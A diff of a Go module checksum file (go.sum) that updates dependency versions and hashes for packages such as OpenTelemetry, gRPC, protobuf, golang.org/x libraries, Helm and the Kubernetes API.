@@ -482,18 +483,30 @@ go.mongodb.org/mongo-driver v1.11.1 h1:QP0znIRTuL0jf1oBQoAoM0C6ZJfBK4kx0Uumtv1A7 go.mongodb.org/mongo-driver v1.11.1/go.mod h1:s7p5vEtfbeR1gYi6pnj3c3/urpbLv2T5Sfd6Rp2HBB8= go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= +go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.49.0 h1:4Pp6oUg3+e/6M4C0A/3kJ2VYa++dsWVTtGgLVj5xtHg= +go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.49.0/go.mod h1:Mjt1i1INqiaoZOMGR1RIUJN+i3ChKoFRqzrRQhlkbs0= +go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.49.0 h1:jq9TW8u3so/bN+JPT166wjOI6/vQPF6Xe7nMNIltagk= +go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.49.0/go.mod h1:p8pYQP+m5XfbZm9fxtSKAbM6oIllS7s2AfxrChvc7iw= +go.opentelemetry.io/otel v1.24.0 h1:0LAOdjNmQeSTzGBzduGe/rU4tZhMwL5rWgtp9Ku5Jfo= +go.opentelemetry.io/otel v1.24.0/go.mod h1:W7b9Ozg4nkF5tWI5zsXkaKKDjdVjpD4oAt9Qi/MArHo= +go.opentelemetry.io/otel/metric v1.24.0 h1:6EhoGWWK28x1fbpA4tYTOWBkPefTDQnb8WSGXlc88kI= +go.opentelemetry.io/otel/metric v1.24.0/go.mod h1:VYhLe1rFfxuTXLgj4CBiyz+9WYBA8pNGJgDcSFRKBco= +go.opentelemetry.io/otel/sdk v1.22.0 h1:6coWHw9xw7EfClIC/+O31R8IY3/+EiRFHevmHafB2Gw= +go.opentelemetry.io/otel/sdk v1.22.0/go.mod h1:iu7luyVGYovrRpe2fmj3CVKouQNdTOkxtLzPvPz1DOc= +go.opentelemetry.io/otel/trace v1.24.0 h1:CsKnnL4dUAr/0llH9FKuc698G04IrpWV0MQA/Y1YELI= +go.opentelemetry.io/otel/trace v1.24.0/go.mod h1:HPc3Xr/cOApsBI154IU0OI0HJexz+aw5uPdbs3UCjNU= go.starlark.net v0.0.0-20230525235612-a134d8f9ddca h1:VdD38733bfYv5tUZwEIskMM93VanwNIi5bIKnDrJdEY= go.starlark.net v0.0.0-20230525235612-a134d8f9ddca/go.mod h1:jxU+3+j+71eXOW14274+SmmuW82qJzl6iZSeqEtTGds= go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= go.uber.org/goleak v1.1.11/go.mod h1:cwTWslyiVhfpKIDGSZEM2HlOvcqm+tG4zioyIeLoqMQ= -go.uber.org/goleak v1.2.0 
h1:xqgm/S+aQvhWFTtR0XK3Jvg7z8kGV8P4X14IzwN3Eqk= -go.uber.org/goleak v1.2.0/go.mod h1:XJYK+MuIchqpmGmUSAzotztawfKvYLUIgg7guXrwVUo= +go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto= +go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE= go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0= go.uber.org/multierr v1.11.0/go.mod h1:20+QtiLqy0Nd6FdQB9TLXag12DsQkrbs3htMFfDN80Y= go.uber.org/zap v1.24.0/go.mod h1:2kMP+WWQ8aoFoedH3T2sq6iJ2yDWpHbP0f6MQbS9Gkg= -go.uber.org/zap v1.26.0 h1:sI7k6L95XOKS281NhVKOFCUNIvv9e0w4BF8N3u+tCRo= -go.uber.org/zap v1.26.0/go.mod h1:dtElttAiwGvoJ/vj4IwHBS/gXsEu/pZ50mUIRWuG0so= +go.uber.org/zap v1.27.0 h1:aJMhYGrd5QSmlpLMr2MftRKl7t8J8PTZPA732ud/XR8= +go.uber.org/zap v1.27.0/go.mod h1:GB2qFLM7cTU87MWRP2mPIjqfIDnGu+VIO4V/SdhGo2E= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 
@@ -502,8 +515,8 @@ golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0 golang.org/x/crypto v0.3.0/go.mod h1:hebNnKkNXi2UzZN1eVRvBB7co0a+JxK6XbPiWVs/3J4= golang.org/x/crypto v0.3.1-0.20221117191849-2c476679df9a/go.mod h1:hebNnKkNXi2UzZN1eVRvBB7co0a+JxK6XbPiWVs/3J4= golang.org/x/crypto v0.7.0/go.mod h1:pYwdfH91IfpZVANVyUOhSIPZaFoJGxTFbZhFTx+dXZU= -golang.org/x/crypto v0.18.0 h1:PGVlW0xEltQnzFZ55hkuX5+KLyrMYhHld1YHO4AKcdc= -golang.org/x/crypto v0.18.0/go.mod h1:R0j02AL6hcrfOiy9T4ZYp/rcWeMxM3L6QYxlOuEG1mg= +golang.org/x/crypto v0.22.0 h1:g1v0xeRhjcugydODzvb3mEM9SQ0HGp9s/nh3COQ/C30= +golang.org/x/crypto v0.22.0/go.mod h1:vr6Su+7cTlO45qkww3VDJlzDn0ctJvRgYbC2NvXHt+M= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= 
@@ -517,14 +530,13 @@ golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.5.1/go.mod h1:5OXOZSfqPIIbmVBIIKWRFfZjPR0E5r58TLhUjH0a2Ro= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= -golang.org/x/mod v0.14.0 h1:dGoOF9QVLYng8IHTm7BAyWqCqSheQ5pYWGhzW00YJr0= -golang.org/x/mod v0.14.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c= +golang.org/x/mod v0.17.0 h1:zY54UmvipHiNd+pm+m0x9KhZ9hl1/7QNMyxXbc6ICqA= +golang.org/x/mod v0.17.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= -golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= 
@@ -537,22 +549,21 @@ golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug golang.org/x/net v0.2.0/go.mod h1:KqCZLdyyvdV855qA2rE3GC2aiw5xGR5TEjj8smXukLY= golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= golang.org/x/net v0.8.0/go.mod h1:QVkue5JL9kW//ek3r6jTKnTFis1tRmNAW2P1shuFdJc= -golang.org/x/net v0.20.0 h1:aCL9BSgETF1k+blQaYUBx9hJ9LOGP3gAVemcZlf1Kpo= -golang.org/x/net v0.20.0/go.mod h1:z8BVo6PvndSri0LbOE3hAn0apkU+1YvI6E70E9jsnvY= +golang.org/x/net v0.24.0 h1:1PcaxkF854Fu3+lvBIx5SYn9wRlBzzcnHZSiaFFAb0w= +golang.org/x/net v0.24.0/go.mod h1:2Q7sJY5mzlzWjKtYUEXSlBWCdyaioyXzRB2RtU8KVE8= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= -golang.org/x/oauth2 v0.15.0 h1:s8pnnxNVzjWyrvYdFUQq5llS1PX2zhPXmccZv99h7uQ= -golang.org/x/oauth2 v0.15.0/go.mod h1:q48ptWNTY5XWf+JNten23lcvHpLJ0ZSxF5ttTHKVCAM= +golang.org/x/oauth2 v0.18.0 h1:09qnuIAgzdx1XplqJvW6CQqMCtGZykZWcXzPMPUusvI= +golang.org/x/oauth2 v0.18.0/go.mod h1:Wf7knwG0MPoWIMMBgFlEaSUDaKskp0dCfrlJRJXbBi8= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.1.0/go.mod 
h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.6.0 h1:5BMeUDZ7vkXGfEr1x9B4bRcTH4lpkTkpdh0T/J+qjbQ= -golang.org/x/sync v0.6.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= +golang.org/x/sync v0.7.0 h1:YsImfSBoP9QPYL0xyKJPq0gcaJdG3rInoqxTWbfQu9M= +golang.org/x/sync v0.7.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 
@@ -580,22 +591,22 @@ golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.8.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.11.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= -golang.org/x/sys v0.15.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= -golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= -golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/sys v0.19.0 h1:q5f1RH2jigJ1MoAWp2KTp3gm5zAGFUTarQZ5U386+4o= +golang.org/x/sys v0.19.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/term v0.0.0-20220526004731-065cf7ba2467/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/term v0.2.0/go.mod h1:TVmDHMZPmdnySmBfhjOoOdhjzdE1h4u1VwSiw2l1Nuc= golang.org/x/term v0.5.0/go.mod h1:jMB1sMXY+tzblOD4FWmEbocvup2/aLOaQEp7JmGp78k= golang.org/x/term v0.6.0/go.mod h1:m6U89DPEgQRMq3DNkDClhWw02AUbt2daBVO4cn4Hv9U= -golang.org/x/term v0.16.0 h1:m+B6fahuftsE9qjo0VWp2FW0mB3MTJvR0BaMQrq0pmE= -golang.org/x/term v0.16.0/go.mod h1:yn7UURbUtPyrVJPGPq404EukNFxcm/foM+bV/bfcDsY= +golang.org/x/term v0.19.0 h1:+ThwsDv+tYfnJFhF4L8jITxu1tdTWRTZpdsWgEgjL6Q= +golang.org/x/term v0.19.0/go.mod h1:2CuTdWZ7KHSQwUzKva0cbMg6q2DMI3Mmxp+gKJbskEk= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.6/go.mod 
h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= +golang.org/x/text v0.3.8/go.mod h1:E6s5w1FMmriuDzIBO73fBruAKo1PCIq6d2Q6DHfQ8WQ= golang.org/x/text v0.4.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/text v0.8.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= 
@@ -617,36 +628,36 @@ golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= golang.org/x/tools v0.1.7/go.mod h1:LGqMHiF4EqQNHR1JncWGqT5BVaXmza+X+BDGol+dOxo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= -golang.org/x/tools v0.17.0 h1:FvmRgNOcs3kOa+T20R1uhfP9F6HgG2mfxDv1vrx1Htc= -golang.org/x/tools v0.17.0/go.mod h1:xsh6VxdV005rRVaS6SSAf9oiAqljS7UZUacMZ8Bnsps= +golang.org/x/tools v0.20.0 h1:hz/CVckiOxybQvFw6h7b/q80NTr9IUQb4s1IIzW7KNY= +golang.org/x/tools v0.20.0/go.mod h1:WvitBU7JJf6A4jOdg4S1tviW9bhUxkgeCui/0JHctQg= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2 h1:H2TDz8ibqkAF6YGhCdN3jS9O0/s90v0rJh3X/OLHEUk= -golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2/go.mod h1:K8+ghG5WaK9qNqU5K3HdILfMLy1f3aNYFI/wnl100a8= -google.golang.org/api v0.152.0 h1:t0r1vPnfMc260S2Ci+en7kfCZaLOPs5KI0sVV/6jZrY= -google.golang.org/api v0.152.0/go.mod h1:3qNJX5eOmhiWYc67jRA/3GsDw97UFb5ivv7Y2PrriAY= +golang.org/x/xerrors v0.0.0-20231012003039-104605ab7028 h1:+cNy6SZtPcJQH3LJVLOSmiC7MMxXNOb3PU/VUEz+EhU= +golang.org/x/xerrors v0.0.0-20231012003039-104605ab7028/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= +google.golang.org/api v0.171.0 h1:w174hnBPqut76FzW5Qaupt7zY8Kql6fiVjgys4f58sU= +google.golang.org/api v0.171.0/go.mod h1:Hnq5AHm4OTMt2BUVjael2CWZFD6vksJdWCWiUAmjC9o= google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine 
v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= -google.golang.org/appengine v1.6.7 h1:FZR1q0exgwxzPzp/aF+VccGrSfxfPpkBqjIIEq3ru6c= -google.golang.org/appengine v1.6.7/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc= +google.golang.org/appengine v1.6.8 h1:IhEN5q69dyKagZPYMSdIjS2HqprW324FRQZJcGqPAsM= +google.golang.org/appengine v1.6.8/go.mod h1:1jJ3jBArFh5pcgW8gCtRJnepW8FzD1V44FJffLiz/Ds= google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= -google.golang.org/genproto v0.0.0-20231106174013-bbf56f31fb17 h1:wpZ8pe2x1Q3f2KyT5f8oP/fa9rHAKgFPr/HZdNuS+PQ= -google.golang.org/genproto v0.0.0-20231106174013-bbf56f31fb17/go.mod h1:J7XzRzVy1+IPwWHZUzoD0IccYZIrXILAQpc+Qy9CMhY= -google.golang.org/genproto/googleapis/api v0.0.0-20231106174013-bbf56f31fb17 h1:JpwMPBpFN3uKhdaekDpiNlImDdkUAyiJ6ez/uxGaUSo= -google.golang.org/genproto/googleapis/api v0.0.0-20231106174013-bbf56f31fb17/go.mod h1:0xJLfVdJqpAPl8tDg1ujOCGzx6LFLttXT5NhllGOXY4= -google.golang.org/genproto/googleapis/rpc v0.0.0-20231120223509-83a465c0220f h1:ultW7fxlIvee4HYrtnaRPon9HpEgFk5zYpmfMgtKB5I= -google.golang.org/genproto/googleapis/rpc v0.0.0-20231120223509-83a465c0220f/go.mod h1:L9KNLi232K1/xB6f7AlSX692koaRnKaWSR0stBki0Yc= +google.golang.org/genproto v0.0.0-20240213162025-012b6fc9bca9 h1:9+tzLLstTlPTRyJTh+ah5wIMsBW5c4tQwGTN3thOW9Y= +google.golang.org/genproto v0.0.0-20240213162025-012b6fc9bca9/go.mod h1:mqHbVIp48Muh7Ywss/AD6I5kNVKZMmAa/QEW58Gxp2s= +google.golang.org/genproto/googleapis/api v0.0.0-20240314234333-6e1732d8331c h1:kaI7oewGK5YnVwj+Y+EJBO/YN1ht8iTL9XkFHtVZLsc= +google.golang.org/genproto/googleapis/api v0.0.0-20240314234333-6e1732d8331c/go.mod h1:VQW3tUculP/D4B+xVCo+VgSq8As6wA9ZjHl//pmk+6s= 
+google.golang.org/genproto/googleapis/rpc v0.0.0-20240314234333-6e1732d8331c h1:lfpJ/2rWPa/kJgxyyXM8PrNnfCzcmxJ265mADgwmvLI= +google.golang.org/genproto/googleapis/rpc v0.0.0-20240314234333-6e1732d8331c/go.mod h1:WtryC6hu0hhx87FDGxWCDptyssuo68sk10vYjF+T9fY= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= -google.golang.org/grpc v1.59.0 h1:Z5Iec2pjwb+LEOqzpB2MR12/eKFhDPhuqW91O+4bwUk= -google.golang.org/grpc v1.59.0/go.mod h1:aUPDwccQo6OTjy7Hct4AfBPD1GptF4fyUjIkQ9YtF98= +google.golang.org/grpc v1.62.1 h1:B4n+nfKzOICUXMgyrNd19h/I9oH0L1pizfk1d4zSgTk= +google.golang.org/grpc v1.62.1/go.mod h1:IWTG0VlJLCh1SkC58F7np9ka9mx/WNkjl4PGJaiq+QE= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= 
@@ -658,15 +669,15 @@ google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpAD google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= -google.golang.org/protobuf v1.31.0 h1:g0LDEJHgrBl9N9r17Ru3sqWhkIx2NB67okBHPwC7hs8= -google.golang.org/protobuf v1.31.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= +google.golang.org/protobuf v1.33.0 h1:uNO2rsAINq/JlFpSdYEKIZ0uKD/R9cpdv0T+yoGwGmI= +google.golang.org/protobuf v1.33.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20200227125254-8fa46927fb4f/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= -gopkg.in/dnaeon/go-vcr.v3 v3.1.2 h1:F1smfXBqQqwpVifDfUBQG6zzaGjzT+EnVZakrOdr5wA= -gopkg.in/dnaeon/go-vcr.v3 v3.1.2/go.mod h1:2IMOnnlx9I6u9x+YBsM3tAMx6AlOxnJ0pWxQAzZ79Ag= +gopkg.in/dnaeon/go-vcr.v3 v3.2.0 h1:Rltp0Vf+Aq0u4rQXgmXgtgoRDStTnFN83cWgSGSoRzM= +gopkg.in/dnaeon/go-vcr.v3 v3.2.0/go.mod h1:2IMOnnlx9I6u9x+YBsM3tAMx6AlOxnJ0pWxQAzZ79Ag= gopkg.in/hjson/hjson-go.v3 v3.0.1/go.mod h1:X6zrTSVeImfwfZLfgQdInl9mWjqPqgH90jom9nym/lw= gopkg.in/inf.v0 v0.9.1 h1:73M5CoZyi3ZLMOyDlQh031Cx6N9NDJ2Vvfl76EDAgDc= gopkg.in/inf.v0 v0.9.1/go.mod h1:cWUDdTG/fYaXco+Dcufb5Vnc6Gp2YChqWtbxRZE0mXw= 
@@ -682,22 +693,22 @@ gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C gopkg.in/yaml.v3 v3.0.0-20200605160147-a5ece683394c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= -helm.sh/helm/v3 v3.14.0 h1:TaZIH6uOchn7L27ptwnnuHJiFrT/BsD4dFdp/HLT2nM= -helm.sh/helm/v3 v3.14.0/go.mod h1:2itvvDv2WSZXTllknfQo6j7u3VVgMAvm8POCDgYH424= +helm.sh/helm/v3 v3.14.3 h1:HmvRJlwyyt9HjgmAuxHbHv3PhMz9ir/XNWHyXfmnOP4= +helm.sh/helm/v3 v3.14.3/go.mod h1:v6myVbyseSBJTzhmeE39UcPLNv6cQK6qss3dvgAySaE= honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= howett.net/plist v1.0.0 h1:7CrbWYbPPO/PyNy38b2EB/+gYbjCe2DXBxgtOOZbSQM= howett.net/plist v1.0.0/go.mod h1:lqaXoTrLY4hg8tnEzNru53gicrbv7rrk+2xJA/7hw9g= -k8s.io/api v0.29.1 h1:DAjwWX/9YT7NQD4INu49ROJuZAAAP/Ijki48GUPzxqw= -k8s.io/api v0.29.1/go.mod h1:7Kl10vBRUXhnQQI8YR/R327zXC8eJ7887/+Ybta+RoQ= +k8s.io/api v0.29.3 h1:2ORfZ7+bGC3YJqGpV0KSDDEVf8hdGQ6A03/50vj8pmw= +k8s.io/api v0.29.3/go.mod h1:y2yg2NTyHUUkIoTC+phinTnEa3KFM6RZ3szxt014a80= 